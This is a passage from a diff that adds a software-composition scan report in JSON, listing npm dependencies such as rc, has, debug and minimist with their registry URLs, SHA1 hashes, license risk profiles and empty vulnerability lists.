"version": "1.2.8", + "groupId": "rc", + "licenses": [ + { + "name": "BSD 2", + "url": "http://opensource.org/licenses/bsd-license", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/49bd48fb-cf5f-4e9c-a9d7-ea466f8f0f02" + }, + { + "name": "Apache 2.0", + "url": "http://apache.org/licenses/LICENSE-2.0", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "linking": "DYNAMIC", + "royaltyFree": "CONDITIONAL" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/0627b8e1-0ff1-4db8-964a-28915d839531" + }, + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/rc/v/1.2.8" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "d39c8746-7f87-49f1-953a-72385b88610a", + "keyId": 26965480, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/has/-/has-1.0.3.tgz", + "homePage": "https://github.com/tarruda/has", + "genericPackageIndex": "https://www.npmjs.org/package/has" + }, + "matchType": "SHA1", + "sha1": "722d7cbfc1f6aa8241f16dd814e011e1f41e8796", + "name": "has-1.0.3.tgz", + "artifactId": "has-1.0.3.tgz", + "version": "1.0.3", + "groupId": "has", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/96a23afa-9938-4463-827d-c883c4c031fa" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "9aaf73ca-e85b-4235-afc6-453853b27d77", + "keyId": 26955419, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/leven/-/leven-2.1.0.tgz", + "homePage": "https://github.com/sindresorhus/leven#readme", + "genericPackageIndex": "https://www.npmjs.org/package/leven" + }, + "matchType": "SHA1", + "sha1": "c2e7a9f772094dee9d34202ae8acce4687875580", + "name": "leven-2.1.0.tgz", + "artifactId": "leven-2.1.0.tgz", + "version": "2.1.0", + "groupId": "leven", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/1f15a520-71b3-4ee1-a006-cb0b51e9f452" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "522c9bc1-8d1f-4286-b62e-06c05bdc5a74", + "keyId": 26954904, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/decode-uri-component/-/decode-uri-component-0.2.0.tgz", + "homePage": "https://github.com/samverschueren/decode-uri-component#readme", + "genericPackageIndex": "https://www.npmjs.org/package/decode-uri-component" + }, + "matchType": "SHA1", + "sha1": "eb3913333458775cb84cd1a1fae062106bb87545", + "name": "decode-uri-component-0.2.0.tgz", + "artifactId": "decode-uri-component-0.2.0.tgz", + "version": "0.2.0", + "groupId": "decode-uri-component", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/21c58578-f0ee-45b8-af1d-d0463357f4cf" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "510f626a-0528-425f-ad45-9a354d47d91c", + "keyId": 26966886, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/parse5/-/parse5-5.1.0.tgz", + "homePage": "https://github.com/inikulin/parse5", + "genericPackageIndex": "https://www.npmjs.org/package/parse5" + }, + "matchType": "SHA1", + "sha1": "c59341c9723f414c452975564c7c00a68d58acd2", + "name": "parse5-5.1.0.tgz", + "artifactId": "parse5-5.1.0.tgz", + "version": "5.1.0", + "groupId": "parse5", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/parse5" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "07d4e7b4-b4d8-4e7e-9620-2b4732697a9f", + "keyId": 26955751, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/process/-/process-0.11.10.tgz", + "homePage": "https://github.com/shtylman/node-process#readme", + "genericPackageIndex": "https://www.npmjs.org/package/process" + }, + "matchType": "SHA1", + "sha1": "7332300e840161bda3e69a1d1d91a7d4bc16f182", + "name": "process-0.11.10.tgz", + "artifactId": "process-0.11.10.tgz", + "version": "0.11.10", + "groupId": "process", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/f1ae8d27-84d2-4210-94b0-31c59bd223cb" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "7dd2096c-e06f-4df2-85c1-45a81c36a20a", + "keyId": 27311320, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/p-try/-/p-try-2.2.0.tgz", + "homePage": "https://github.com/sindresorhus/p-try#readme", + "genericPackageIndex": "https://www.npmjs.org/package/p-try" + }, + "matchType": "SHA1", + "sha1": "cb2868540e313d61de58fafbe35ce9004d5540e6", + "name": "p-try-2.2.0.tgz", + "artifactId": "p-try-2.2.0.tgz", + "version": "2.2.0", + "groupId": "p-try", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/p-try/v/2.2.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "d937a968-ec87-49ab-acac-3494d84a9a82", + "keyId": 26954821, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/minimalistic-crypto-utils/-/minimalistic-crypto-utils-1.0.1.tgz", + "homePage": "https://github.com/indutny/minimalistic-crypto-utils#readme", + "genericPackageIndex": "https://www.npmjs.org/package/minimalistic-crypto-utils" + }, + "matchType": "SHA1", + "sha1": "f6c00c1c0b082246e5c4d99dfb8c7c083b2b582a", + "name": "minimalistic-crypto-utils-1.0.1.tgz", + "artifactId": "minimalistic-crypto-utils-1.0.1.tgz", + "version": "1.0.1", + "groupId": "minimalistic-crypto-utils", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/5f1bbceb-9b64-482f-8798-f84457438f8d" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "791bec59-3003-4b56-8ce9-c4da6471cdd6", + "keyId": 26965632, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/update-notifier/-/update-notifier-2.5.0.tgz", + "homePage": "https://github.com/yeoman/update-notifier#readme", + "genericPackageIndex": "https://www.npmjs.org/package/update-notifier" + }, + "matchType": "SHA1", + "sha1": "d0744593e13f161e406acb1d9408b72cad08aff6", + "name": "update-notifier-2.5.0.tgz", + "artifactId": "update-notifier-2.5.0.tgz", + "version": "2.5.0", + "groupId": "update-notifier", + "licenses": [ + { + "name": "BSD 2", + "url": "http://opensource.org/licenses/bsd-license", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/c904bd3e-6573-4c3b-a06e-10acba73a7ac" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "3d8ffd93-8940-4357-bd86-74b3244ad0f3", + "keyId": 26955787, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/content-type/-/content-type-1.0.4.tgz", + "homePage": "https://github.com/jshttp/content-type#readme", + "genericPackageIndex": "https://www.npmjs.org/package/content-type" + }, + "matchType": "SHA1", + "sha1": "e138cc75e040c727b1966fe5e5f8c9aee256fe3b", + "name": "content-type-1.0.4.tgz", + "artifactId": "content-type-1.0.4.tgz", + "version": "1.0.4", + "groupId": "content-type", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/content-type" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "3b6664ae-1661-4f7a-93a4-c78b9653a325", + "keyId": 26984147, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/is-ci/-/is-ci-1.2.1.tgz", + "homePage": "https://github.com/watson/is-ci", + "genericPackageIndex": "https://www.npmjs.org/package/is-ci" + }, + "matchType": "SHA1", + "sha1": "e3779c8ee17fccf428488f6e281187f2e632841c", + "name": "is-ci-1.2.1.tgz", + "artifactId": "is-ci-1.2.1.tgz", + "version": "1.2.1", + "groupId": "is-ci", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/is-ci" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "8610cf82-fab9-4852-8397-a856958632b2", + "keyId": 26948444, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/commander/-/commander-2.9.0.tgz", + "homePage": "https://github.com/tj/commander.js#readme", + "genericPackageIndex": "https://www.npmjs.org/package/commander" + }, + "matchType": "SHA1", + "sha1": "9c99094176e12240cb22d6c5146098400fe0f7d4", + "name": "commander-2.9.0.tgz", + "artifactId": "commander-2.9.0.tgz", + "version": "2.9.0", + "groupId": "commander", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/f433b139-f5b9-4d90-910e-5f9f2595ff86" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "65b75748-1e85-4685-a23a-241152c2498c", + "keyId": 26954775, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/unique-string/-/unique-string-1.0.0.tgz", + "homePage": "https://github.com/sindresorhus/unique-string#readme", + "genericPackageIndex": "https://www.npmjs.org/package/unique-string" + }, + "matchType": "SHA1", + "sha1": "9e1057cca851abb93398f8b33ae187b99caec11a", + "name": "unique-string-1.0.0.tgz", + "artifactId": "unique-string-1.0.0.tgz", + "version": "1.0.0", + "groupId": "unique-string", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/5888656b-2ece-457f-bac9-b6fd45b44514" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "7fd938a7-2cde-4e39-b2dc-4e86c1b717ea", + "keyId": 26948589, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", + "homePage": "https://github.com/isaacs/json-stringify-safe", + "genericPackageIndex": "https://www.npmjs.org/package/json-stringify-safe" + }, + "matchType": "SHA1", + "sha1": "1296a2d58fd45f19a0f6ce01d65701e2c735b6eb", + "name": "json-stringify-safe-5.0.1.tgz", + "artifactId": "json-stringify-safe-5.0.1.tgz", + "version": "5.0.1", + "groupId": "json-stringify-safe", + "licenses": [ + { + "name": "ISC", + "url": "http://www.opensource.org/licenses/ISC", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/json-stringify-safe" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "c5785c60-810f-44e3-a90f-31a1e1fa6a00", + "keyId": 27387628, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/setprototypeof/-/setprototypeof-1.1.1.tgz", + "homePage": "https://github.com/wesleytodd/setprototypeof", + "genericPackageIndex": "https://www.npmjs.org/package/setprototypeof" + }, + "matchType": "SHA1", + "sha1": "7e95acb24aa92f5885e0abef5ba131330d4ae683", + "name": "setprototypeof-1.1.1.tgz", + "artifactId": "setprototypeof-1.1.1.tgz", + "version": "1.1.1", + "groupId": "setprototypeof", + "licenses": [ + { + "name": "ISC", + "url": "http://www.opensource.org/licenses/ISC", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/setprototypeof" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "7b1210f6-79df-4a8f-aebc-75d6af54732e", + "keyId": 26955512, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/currently-unhandled/-/currently-unhandled-0.4.1.tgz", + "homePage": "https://github.com/jamestalmage/currently-unhandled#readme", + "genericPackageIndex": "https://www.npmjs.org/package/currently-unhandled" + }, + "matchType": "SHA1", + "sha1": "988df33feab191ef799a61369dd76c17adf957ea", + "name": "currently-unhandled-0.4.1.tgz", + "artifactId": "currently-unhandled-0.4.1.tgz", + "version": "0.4.1", + "groupId": "currently-unhandled", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/currently-unhandled" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "c77c1843-d0f6-440a-abfb-5b71d9a47541", + "keyId": 26967812, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/formidable/-/formidable-1.2.1.tgz", + "homePage": "https://github.com/felixge/node-formidable", + "genericPackageIndex": "https://www.npmjs.org/package/formidable" + }, + "matchType": "SHA1", + "sha1": "70fb7ca0290ee6ff961090415f4b3df3d2082659", + "name": "formidable-1.2.1.tgz", + "artifactId": "formidable-1.2.1.tgz", + "version": "1.2.1", + "groupId": "formidable", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/formidable/v/1.2.1" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "889be83d-c884-42d3-82c6-a28ce8890d84", + "keyId": 26954615, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/debug/-/debug-3.1.0.tgz", + "homePage": "https://github.com/visionmedia/debug#readme", + "genericPackageIndex": "https://www.npmjs.org/package/debug" + }, + "matchType": "SHA1", + "sha1": "5bb5a0672628b64149566ba16819e61518c67261", + "name": "debug-3.1.0.tgz", + "artifactId": "debug-3.1.0.tgz", + "version": "3.1.0", + "groupId": "debug", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/debug" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "96d2aa5b-35a2-462e-86dd-3294b5aa495e", + "keyId": 26954943, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/string-width/-/string-width-2.1.1.tgz", + "homePage": "https://github.com/sindresorhus/string-width#readme", + "genericPackageIndex": "https://www.npmjs.org/package/string-width" + }, + "matchType": "SHA1", + "sha1": "ab93f27a8dc13d28cac815c462143a6d9012ae9e", + "name": "string-width-2.1.1.tgz", + "artifactId": "string-width-2.1.1.tgz", + "version": "2.1.1", + "groupId": "string-width", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/string-width" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "f2e2698a-8950-4b0a-be1e-fed801552f1f", + "keyId": 26948649, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", + "homePage": "https://github.com/andyperlitch/jsbn#readme", + "genericPackageIndex": "https://www.npmjs.org/package/jsbn" + }, + "matchType": "SHA1", + "sha1": "a5e654c2e5a2deb5f201d96cefbca80c0ef2f513", + "name": "jsbn-0.1.1.tgz", + "artifactId": "jsbn-0.1.1.tgz", + "version": "0.1.1", + "groupId": "jsbn", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/jsbn" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "69d9cc82-d4db-48c9-872b-dfa116cb60c4", + "keyId": 26965448, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/capture-stack-trace/-/capture-stack-trace-1.0.1.tgz", + "homePage": "https://github.com/floatdrop/capture-stack-trace#readme", + "genericPackageIndex": "https://www.npmjs.org/package/capture-stack-trace" + }, + "matchType": "SHA1", + "sha1": "a6c0bbe1f38f3aa0b92238ecb6ff42c344d4135d", + "name": "capture-stack-trace-1.0.1.tgz", + "artifactId": "capture-stack-trace-1.0.1.tgz", + "version": "1.0.1", + "groupId": "capture-stack-trace", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/d4e63b72-f881-48a9-87fc-2a64212c619b" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "38d56f74-83f3-456f-84ae-a921e6195d7f", + "keyId": 26949247, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/number-is-nan/-/number-is-nan-1.0.1.tgz", + "homePage": "https://github.com/sindresorhus/number-is-nan#readme", + "genericPackageIndex": "https://www.npmjs.org/package/number-is-nan" + }, + "matchType": "SHA1", + "sha1": "097b602b53422a522c1afb8790318336941a011d", + "name": "number-is-nan-1.0.1.tgz", + "artifactId": "number-is-nan-1.0.1.tgz", + "version": "1.0.1", + "groupId": "number-is-nan", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/number-is-nan" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "e930b034-b587-452c-945c-6da81abfcd32", + "keyId": 27607377, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/autodll-webpack-plugin/-/autodll-webpack-plugin-0.4.2.tgz", + "homePage": "https://github.com/asfktz/autodll-webpack-plugin#readme", + "genericPackageIndex": "https://www.npmjs.org/package/autodll-webpack-plugin" + }, + "matchType": "SHA1", + "sha1": "36e98fbaf30c235d1d5d076330464ac80901415c", + "name": "autodll-webpack-plugin-0.4.2.tgz", + "artifactId": "autodll-webpack-plugin-0.4.2.tgz", + "version": "0.4.2", + "groupId": "autodll-webpack-plugin", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/autodll-webpack-plugin" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "152d2b0b-1ef5-4b3b-ac15-8b583425275c", + "keyId": 26950198, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/debug/-/debug-2.6.9.tgz", + "homePage": "https://github.com/visionmedia/debug#readme", + "genericPackageIndex": "https://www.npmjs.org/package/debug" + }, + "matchType": "SHA1", + "sha1": "5d128515df134ff327e90a4c93f4e077a536341f", + "name": "debug-2.6.9.tgz", + "artifactId": "debug-2.6.9.tgz", + "version": "2.6.9", + "groupId": "debug", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/28d1f00c-c565-4285-afb0-0ac163937d74" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "34103cb8-9dcd-4e64-9b19-2f60001cb884", + "keyId": 26948787, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/minimist/-/minimist-0.0.8.tgz", + "homePage": "https://github.com/substack/minimist", + "genericPackageIndex": "https://www.npmjs.org/package/minimist" + }, + "matchType": "SHA1", + "sha1": "857fcabfc3397d2625b8228262e86aa7a011b05d", + "name": "minimist-0.0.8.tgz", + "artifactId": "minimist-0.0.8.tgz", + "version": "0.0.8", + "groupId": "minimist", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/90fcb680-1321-41ee-91b1-eb554c6a74b6" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "c6d8e88a-8380-4e4a-9475-3c922310cf9d", + "keyId": 26949329, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/is-finite/-/is-finite-1.0.2.tgz", + "homePage": "https://github.com/sindresorhus/is-finite#readme", + "genericPackageIndex": "https://www.npmjs.org/package/is-finite" + }, + "matchType": "SHA1", + "sha1": "cc6677695602be550ef11e8b4aa6305342b6d0aa", + "name": "is-finite-1.0.2.tgz", + "artifactId": "is-finite-1.0.2.tgz", + "version": "1.0.2", + "groupId": "is-finite", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/is-finite/v/1.0.2" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "baaeaf20-dc92-4e2c-8ea7-0f5708314905", + "keyId": 26954994, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/is-npm/-/is-npm-1.0.0.tgz", + "homePage": "https://github.com/sindresorhus/is-npm", + "genericPackageIndex": "https://www.npmjs.org/package/is-npm" + }, + "matchType": "SHA1", + "sha1": "f2fb63a65e4905b406c86072765a1a4dc793b9f4", + "name": "is-npm-1.0.0.tgz", + "artifactId": "is-npm-1.0.0.tgz", + "version": "1.0.0", + "groupId": "is-npm", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/75e0e6e0-870a-4d38-bccf-66bed37de68b" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "d5e4a723-5cc1-4708-8918-bb0cb32da7cc", + "keyId": 26955719, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/babel-types/-/babel-types-6.26.0.tgz", + "homePage": "https://babeljs.io/", + "genericPackageIndex": "https://www.npmjs.org/package/babel-types" + }, + "matchType": "SHA1", + "sha1": "a3b073f94ab49eb6fa55cd65227a334380632497", + "name": "babel-types-6.26.0.tgz", + "artifactId": "babel-types-6.26.0.tgz", + "version": "6.26.0", + "groupId": "babel-types", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/5061871b-9aec-4978-9d03-23c094d9a632" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "56a94b76-c40f-4461-bac1-213e4cd08d62", + "keyId": 26955817, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/media-typer/-/media-typer-0.3.0.tgz", + "homePage": "https://github.com/jshttp/media-typer", + "genericPackageIndex": "https://www.npmjs.org/package/media-typer" + }, + "matchType": "SHA1", + "sha1": "8710d7af0aa626f8fffa1ce00168545263255748", + "name": "media-typer-0.3.0.tgz", + "artifactId": "media-typer-0.3.0.tgz", + "version": "0.3.0", + "groupId": "media-typer", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": 